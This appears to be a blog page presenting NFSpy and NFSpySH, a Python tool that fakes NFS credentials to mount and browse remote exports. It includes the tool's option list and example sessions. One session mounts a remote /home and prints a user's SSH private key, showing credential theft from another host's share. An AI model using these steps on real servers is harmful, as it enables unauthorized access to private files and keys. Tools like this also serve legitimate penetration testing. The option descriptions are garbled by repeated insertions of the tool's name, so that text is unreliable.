NFSpy And NFSpySH

Description

NFSpy And NFSpySH is a Python library for automating the falsification of NFS credentials when mounting an NFS share. Included are two client programs:

  • nfspy uses the Filesystem in Userspace (FUSE) library to mount an NFS share in Linux. This allows the use of any regular file-searching and manipulation programs like grep and find to explore the NFS export.

  • nfspysh is a ftp-like interactive shell for exploring NFS exports. It does not require the FUSE library, so it can run on non-Linux platforms.

Usage

Syntax

nfspy [mountpoint] [options]

Options

    --version              show program's version number and NFSpy And NFSpySH exit
    -h, --help             show this help message and exit
    -o opt,[opt...]        mount options
    -o server=HOST:PATH    connect to server HOST:PATH
    -o hide                Immediately unmount from the server, staying
                           mounted on the client
    -o cachesize=N         Number of handles to cache
    -o cachetimeout=T      Timeout on handle cache
    -o mountport=PORT/TRANSPORT
                           Specify port/transport for mount protocol, e.g.
                           "635/udp"
    -o nfsport=PORT/TRANSPORT
                           Specify port/transport for NFS protocol, e.g.
                           "2049/udp"
    -o dirhandle=00:AA:BB...
                           Use a hex bytes representation of a directory
                           handle instead of using mountd. Colons are ignored.
    -o getroot             Try to find the top-level directory of the export
                           from the directory handle provided with "dirhandle"
    -o fakename=HOSTNAME   try to fake your hostname

FUSE options:
    -d   -o debug          enable debug output (implies -f)
    -f                     foreground operation
    -s                     disable multi-threaded operation

    -o allow_other         allow access to other users NFSpy And NFSpySH
    -o allow_root          allow access to root
    -o auto_unmount        auto unmount on process termination
    -o nonempty            allow mounts over non-empty file/dir
    -o default_permissions enable permission checking by kernel
    -o fsname=NAME         set filesystem name using NFSpy And NFSpySH
    -o subtype=NAME        set filesystem type using NFSpy And NFSpySH
    -o large_read          issue large read requests (2.4 only)
    -o max_read=N          set maximum size of read requests

    -o hard_remove         immediate removal (don't hide files)
    -o use_ino             let filesystem set inode numbers
    -o readdir_ino         try to fill in d_ino in readdir using NFSpy And NFSpySH
    -o direct_io           use direct I/O
    -o kernel_cache        cache files in kernel
    -o [no]auto_cache      enable caching based on modification times (off)
    -o umask=M             set file permissions (octal)
    -o uid=N               set file owner
    -o gid=N               set file group
    -o entry_timeout=T     cache timeout for names (1.0s)
    -o negative_timeout=T  cache timeout for deleted names (0.0s)
    -o attr_timeout=T      cache timeout for attributes (1.0s)
    -o ac_attr_timeout=T   auto cache timeout for attributes (attr_timeout)
    -o noforget            never forget cached inodes using NFSpy And NFSpySH
    -o remember=T          remember cached inodes for T seconds (0s)
    -o intr                allow requests to be interrupted
    -o intr_signal=NUM     signal to send on interrupt (10)
    -o modules=M1[:M2...]  names of modules to push onto filesystem stack

    -o max_write=N         set maximum size of write requests
    -o max_readahead=N     set maximum readahead
    -o max_background=N    set number of maximum background requests
    -o congestion_threshold=N  set kernel's congestion threshold
    -o async_read          perform reads asynchronously (default)
    -o sync_read           perform reads synchronously using NFSpy And NFSpySH
    -o atomic_o_trunc      enable atomic open+truncate support
    -o big_writes          enable larger than 4kB writes
    -o no_remote_lock      disable remote file locking
    -o no_remote_flock     disable remote file locking (BSD) using  NFSpy And NFSpySH
    -o no_remote_posix_lock disable remove file locking (POSIX)
    -o [no_]splice_write   use splice to write to the fuse device 
    -o [no_]splice_move    move data while splicing to the fuse device
    -o [no_]splice_read    use splice to read from the fuse device using NFSpy And NFSpySH

Module options:

[iconv]
    -o from_code=CHARSET   original encoding of file names (default: UTF-8)
    -o to_code=CHARSET	    new encoding of the file names (default: UTF-8)

[subdir]
    -o subdir=DIR	    prepend this directory to all paths (mandatory)
    -o [no]rellinks	    transform absolute symlinks to relative

Example

NFSPY

cyborg@cyborg:~$ sudo nfspy -o server=192.168.1.124:/home,hide,allow_other,ro,intr /mnt
cyborg@cyborg:~$ cd /mnt
cyborg@cyborg/mnt$ ls -l
drwx------ 74 8888 200 4096 2011-03-03 09:55 cyborg
cyborg@cyborg/mnt$ cd cyborg
cyborg@cyborg/mnt/cyborg$ cat .ssh/id.rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,30AEB543E512CA19
<snip>

NFSPYSH

cyborg@cyborg:~$ nfspysh -o server=127.0.0.1:/home/cyborg/nfs
cyborg@127.0.0.1:/home/cyborg/nfs:/> ls
/:
040775  1000  1000       4096 2013-04-13 23:20:37 .
040775  1000  1000       4096 2013-04-13 23:20:37 ..
040775  1000  1000       4096 2013-04-11 06:36:48 public
040775  1000  1000       4096 2013-04-13 23:26:40 more
040700     0  1000       4096 2013-04-11 06:39:12 secrets
100666  1000  1000          5 2013-04-13 23:28:02 README.md
120777  1000  1000         21 2013-04-13 13:00:24 nmap -> /usr/local/share/nmap
cyborg@127.0.0.1:/home/cyborg/nfs:/more> help
Known commands:
    cd
    chmod
    chown
    exit
    get
    help
    lcd
    lpwd
    ls
    mkdir
    mv
    put
    pwd
    rm
    rmdir
    umask
0 Comments

Leave a reply

CONTACT US

We're are building as a community and a team. Be a part of it.

Sending

©2017 Ztrela Knowledge Solutions Pvt. Ltd

Log in with your credentials

Forgot your details?